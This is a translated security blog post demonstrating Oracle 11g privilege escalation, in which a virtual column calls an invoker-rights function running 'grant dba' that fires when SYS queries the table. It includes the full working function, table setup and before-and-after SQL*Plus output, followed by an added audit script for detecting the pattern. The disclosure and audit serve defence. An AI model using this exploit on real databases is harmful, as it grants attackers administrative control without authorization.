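Oracle 11g: Gaining DBA Privileges via Virtual Columns
Author: Birdarmy
First published on 微安全, the technical blog of the Sina Weibo security team. Please credit the source when reposting.
[Thanks to Birdarmy of Linux520 for contributing this article]
Oracle 11g introduces a new feature: virtual columns.
The official documentation describes it as follows: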
A virtual column is not stored on disk. Rather, the database derives the values in a virtual column on demand by computing a set of expressions or functions. Virtual columns can be used in queries, DML, and DDL statements.
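With a virtual column, the database evaluates the expression or function only when the column's data is needed and does not store the result on disk, much like a view.
Virtual column syntax: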
column_name [datatype] [GENERATED ALWAYS] AS (expression) [VIRTUAL]
For example:
SQL> create table test(a int,b int,c generated always as (a+b) virtual);
Table created.
SQL> insert into test (a ,b ) values (10,20);
1 row created.
SQL> select * from test;
         A          B          C
---------- ---------- ----------
        10         20         30
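Because a virtual column can call a function, a user who also has the privilege to create functions can use the granting function commonly seen in Oracle privilege escalation. The granting function is placed in a virtual column; when sys queries the table the function fires (any other way of triggering the function works just as well), and the user is elevated to DBA.
Example:
First we create a user birdarmy who is allowed to create tables and functions. To keep the test simple, I grant the connect and resource roles directly.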
SQL> create user birdarmy identified by 123456;
User created.
SQL> grant connect,resource to birdarmy;
Grant succeeded.
Log in as birdarmy and create the exploit function and table.
[oracle@ORA-TEST-03 ~]$ sqlplus birdarmy@gc12
SQL*Plus: Release 11.2.0.2.0 Production on Mon May 7 15:36:12 2012
Copyright (c) 1982, 2010, Oracle. All rights reserved.
Enter password:
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
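Create a granting function that runs grant dba to birdarmy to escalate privileges. When sys or another user with high-level grant rights calls this function, birdarmy is elevated to DBA.
SQL> CREATE OR REPLACE FUNCTION GRANT_DBA_TO_USER (v IN INT)
  -- AUTHID CURRENT_USER: the body runs with the privileges of whoever invokes it
  RETURN INT AUTHID CURRENT_USER DETERMINISTIC
AS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'grant dba to birdarmy';
  RETURN 0;
END GRANT_DBA_TO_USER;
/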
Create a test table, exploit_virtual_columns, that uses the granting function in a virtual column.
SQL> create table exploit_virtual_columns(a int,b generated always AS (GRANT_DBA_TO_USER (a)) virtual);
Insert one row, so that the virtual column's function fires when a user queries exploit_virtual_columns.
SQL> insert into exploit_virtual_columns (a) values (1);
Check the current user's privileges: only connect and resource.
SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
BIRDARMY                       CONNECT                        NO  YES NO
BIRDARMY                       RESOURCE                       NO  YES NO
[oracle@ORA-TEST-03 ~]$ sqlplus / as sysdba
SQL*Plus: Release 11.2.0.2.0 Production on Mon May 7 15:42:43 2012
Copyright (c) 1982, 2010, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
Query exploit_virtual_columns as sys, which triggers the GRANT_DBA_TO_USER function in the virtual column.
SQL> select * from birdarmy.exploit_virtual_columns;
         A          B
---------- ----------
         1          0
[oracle@ORA-TEST-03 ~]$ sqlplus birdarmy@gc12
SQL*Plus: Release 11.2.0.2.0 Production on Mon May 7 15:43:14 2012
Copyright (c) 1982, 2010, Oracle. All rights reserved.
Enter password:
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
Check the user's privileges: DBA has been obtained.
SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
BIRDARMY                       CONNECT                        NO  YES NO
BIRDARMY                       DBA                            NO  YES NO
BIRDARMY                       RESOURCE                       NO  YES NO
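For auditing a database against the pattern shown above, the following is an added example, not part of the original post: it lists virtual columns whose expression names a user-created function, marks functions declared AUTHID CURRENT_USER, and then lists who holds the DBA role. It assumes a DBA session in SQL*Plus and that each virtual-column expression fits in 32K; the function-name matching is a plain substring test chosen for this sketch.

```sql
-- Added audit example, not from the original post. Run as a DBA.
-- Assumption: virtual-column expressions fit in 32K, so the LONG column
-- DATA_DEFAULT can be copied into a VARCHAR2 inside PL/SQL.
SET SERVEROUTPUT ON
DECLARE
  v_expr VARCHAR2(32767);
BEGIN
  -- 1. Virtual columns outside SYS/SYSTEM whose expression names a
  --    standalone user function. Substring matching can over-report;
  --    treat each hit as a lead to review by hand.
  FOR c IN (SELECT owner, table_name, column_name, data_default
              FROM dba_tab_cols
             WHERE virtual_column = 'YES'
               AND owner NOT IN ('SYS', 'SYSTEM')) LOOP
    v_expr := c.data_default;          -- LONG copied to VARCHAR2
    v_expr := UPPER(v_expr);
    FOR f IN (SELECT owner, object_name, authid
                FROM dba_procedures
               WHERE object_type = 'FUNCTION'
                 AND owner NOT IN ('SYS', 'SYSTEM')) LOOP
      IF INSTR(v_expr, UPPER(f.object_name)) > 0 THEN
        DBMS_OUTPUT.PUT_LINE(
          c.owner || '.' || c.table_name || '.' || c.column_name ||
          ' calls ' || f.owner || '.' || f.object_name ||
          ' (AUTHID ' || f.authid || ')' ||
          CASE WHEN f.authid = 'CURRENT_USER'
               THEN '  <-- runs with the querying user''s privileges'
          END);
      END IF;
    END LOOP;
  END LOOP;
END;
/

-- 2. Accounts that hold the DBA role; compare against the expected list.
SELECT grantee, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
 ORDER BY grantee;
```

Any column flagged with AUTHID CURRENT_USER in a low-privileged schema deserves review before a privileged account queries that table, since the function body executes with the querying user's rights.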